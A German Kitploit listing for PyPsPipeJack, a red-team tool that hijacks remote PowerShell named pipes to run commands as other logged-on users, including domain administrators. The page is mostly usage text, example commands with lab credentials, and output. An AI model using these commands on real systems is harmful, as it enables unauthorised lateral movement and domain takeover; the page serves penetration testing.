Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
PyPsPipeJack — Python-Implementierung von OpenPsPipeJack | Kitploit
Tools/GitHubGitHub/e-fin/pypspipejack
Privilege EscalationLaterale BewegungPost-ExploitationPenetrationstestsRed TeamingRemote-Access-Tool
GitHube-fin/pypspipejack

PyPsPipeJack

Python-Implementierung von OpenPsPipeJack

Repository anzeigen
2327vor 1 MonatNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

PyPsPipeJack

Dieses Tool ist die Fortsetzung meines anderen Tools, OpenPsPipeJack. Es basiert auf Python und funktioniert unter Linux weitgehend mit Impacket.

Kurz gesagt: Wenn Sie lokale Administratorrechte auf einem entfernten Host haben, können Sie eine Verbindung zu entfernten PowerShell-Sitzungen auf diesem Host herstellen und Befehle in diesen PowerShell-Sitzungen ausführen. Das bietet nicht nur Möglichkeiten zur lateralen Bewegung, sondern auch zur Privilege Escalation. Wenn Sie beispielsweise durch etwas wie RBCD, Shadow Credentials usw. lokalen Administratorzugriff erhalten und sich auf dem entfernten Host ein Domain-Administrator mit geöffneter PowerShell-Sitzung befindet, können Sie Befehle als Domain-Administrator ausführen und einen von Ihnen kontrollierten Benutzer zur Gruppe „Domain Admins“ hinzufügen.

Installation

root@kitploit:~
git clone https://github.com/e-fin/PyPsPipeJack.git
cd PyPsPipeJack
python3 -m venv .
source bin/activate
python3 -m pip install -r requirements

Verwendung

root@kitploit:~
usage: PyPsPipeJack.py [-h] [-debug] [-hashes LMHASH:NTHASH] [-no-pass] [-k] [-aesKey hex key] [-dc-ip ip address] [-target-ip ip address] [-port [destination port]] [--list] [--pipe PIPE] [--command COMMAND] [--script SCRIPT] target

PowerShell Pipe Jacker

positional arguments:
  target                [[domain/]username[:password]@]<targetName or address>

options:
  -h, --help            show this help message and exit
  -debug                Turn DEBUG output ON

authentication:
  -hashes LMHASH:NTHASH
                        NTLM hashes, format is LMHASH:NTHASH
  -no-pass              don't ask for password (useful for -k)
  -k                    Use Kerberos authentication. Grabs credentials from ccache file (KRB5CCNAME) based on target parameters. If valid credentials cannot be found, it will use the ones specified in the command line
  -aesKey hex key       AES key to use for Kerberos Authentication (128 or 256 bits)

connection:
  -dc-ip ip address     IP Address of the domain controller. If omitted it will use the domain part (FQDN) specified in the target parameter
  -target-ip ip address
                        IP Address of the target machine. If omitted it will use whatever was specified as target. This is useful when target is the NetBIOS name and you cannot resolve it
  -port [destination port]
                        Destination port to connect to SMB Server

PowerShell Pipes:
  --list                list PSHost pipes and exit
  --pipe PIPE           full pipe name under IPC$ to connect to
  --command COMMAND     run one command and exit (non-interactive)
  --script SCRIPT       run entire PS1 file

Beispiele

Remote-PSHost-Pipes auflisten (Anmeldedaten)

root@kitploit:~
$ python3 PyPsPipeJack.py 'localhost/administrator:P@ssw0rd'@192.168.1.101 --list

PSHost pipes on target:
   PSHost.134296493751823186.13108.DefaultAppDomain.powershell

Remote-PSHost-Pipes auflisten (Kerberos)

root@kitploit:~
$ python3 PyPsPipeJack.py -k -no-pass ws01.lab.local --list      
  
PSHost pipes on target:
   PSHost.134296493751823186.13108.DefaultAppDomain.powershell

Mit Remote-PSHost-Pipe verbinden (Anmeldedaten)

root@kitploit:~
$ python3 PyPsPipeJack.py 'localhost/administrator:P@ssw0rd'@192.168.1.101 --pipe PSHost.134296493751823186.13108.DefaultAppDomain.powershell --command '[System.Security.Principal.WindowsIdentity]::GetCurrent().Name'

LAB\administrator

Mit Remote-PSHost-Pipe verbinden (Kerberos)

root@kitploit:~
$ python3 PyPsPipeJack.py -k -no-pass ws01.lab.local --pipe PSHost.134296493751823186.13108.DefaultAppDomain.powershell --command '[System.Security.Principal.WindowsIdentity]::GetCurrent().Name'

LAB\administrator

Interaktiv mit Remote-PSHost-Pipe verbinden

root@kitploit:~
$ python3 PyPsPipeJack.py 'localhost/administrator:P@ssw0rd'@192.168.1.101 --pipe PSHost.134296493751823186.13108.DefaultAppDomain.powershell   

Connected. Enter PowerShell commands; 'exit' to quit.
PS> whoami
lab\administrator
PS> $i = "hello"
PS> echo $i
hello
PS> 

Mit Remote-PSHost-Pipe verbinden und PS1-Skript ausführen

root@kitploit:~
$ cat test.ps1                                
echo hello
echo hello2
whoami
ipconfig

$ python3 PyPsPipeJack.py 'localhost/administrator:P@ssw0rd'@192.168.1.101 --pipe PSHost.134296493751823186.13108.DefaultAppDomain.powershell --script test.ps1

hello
hello2
lab\administrator

Windows IP Configuration


Ethernet adapter Ethernet0:

   Connection-specific DNS Suffix  . : lab.local
   Link-local IPv6 Address . . . . . : fe80::f0d3:c6c2:48ad:94f5%13
   IPv4 Address. . . . . . . . . . . : 192.168.1.101
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : fe80::20c:29ff:fe9d:a180%13
                                       192.168.1.1


Herausfinden, welchem Benutzer die PowerShell-Pipe gehört, ohne Befehle auszuführen (WMIQUERY)

Sie müssen kein whoami oder einen anderen PowerShell-Befehl ausführen, um zu sehen, wem die PowerShell-Pipe gehört. Wir können das mit wmiquery.py aus Impacket überprüfen. Die WMI Query Language (WQL) wird massiv unterschätzt.

Hier sind die Befehle, die Sie benötigen, mit einem Screenshot-Beispiel:

root@kitploit:~
## Replace 13108 with PID from PSHost Pipe
# Example: PSHost.134296493751823186.13108.DefaultAppDomain.powershell

WQL> ASSOCIATORS OF {Win32_Process.Handle="13108"} WHERE AssocClass=Win32_SessionProcess

WQL> SELECT * FROM Win32_LoggedOnUser

Alt text

Offene Aufgaben

  • Ausführung einer gesamten PowerShell-Datei ermöglichen
  • Interaktive PowerShell-Konsole
  • Bessere Methode finden, um zu ermitteln, wem die PSHost-Pipe gehört
Tool herunterladen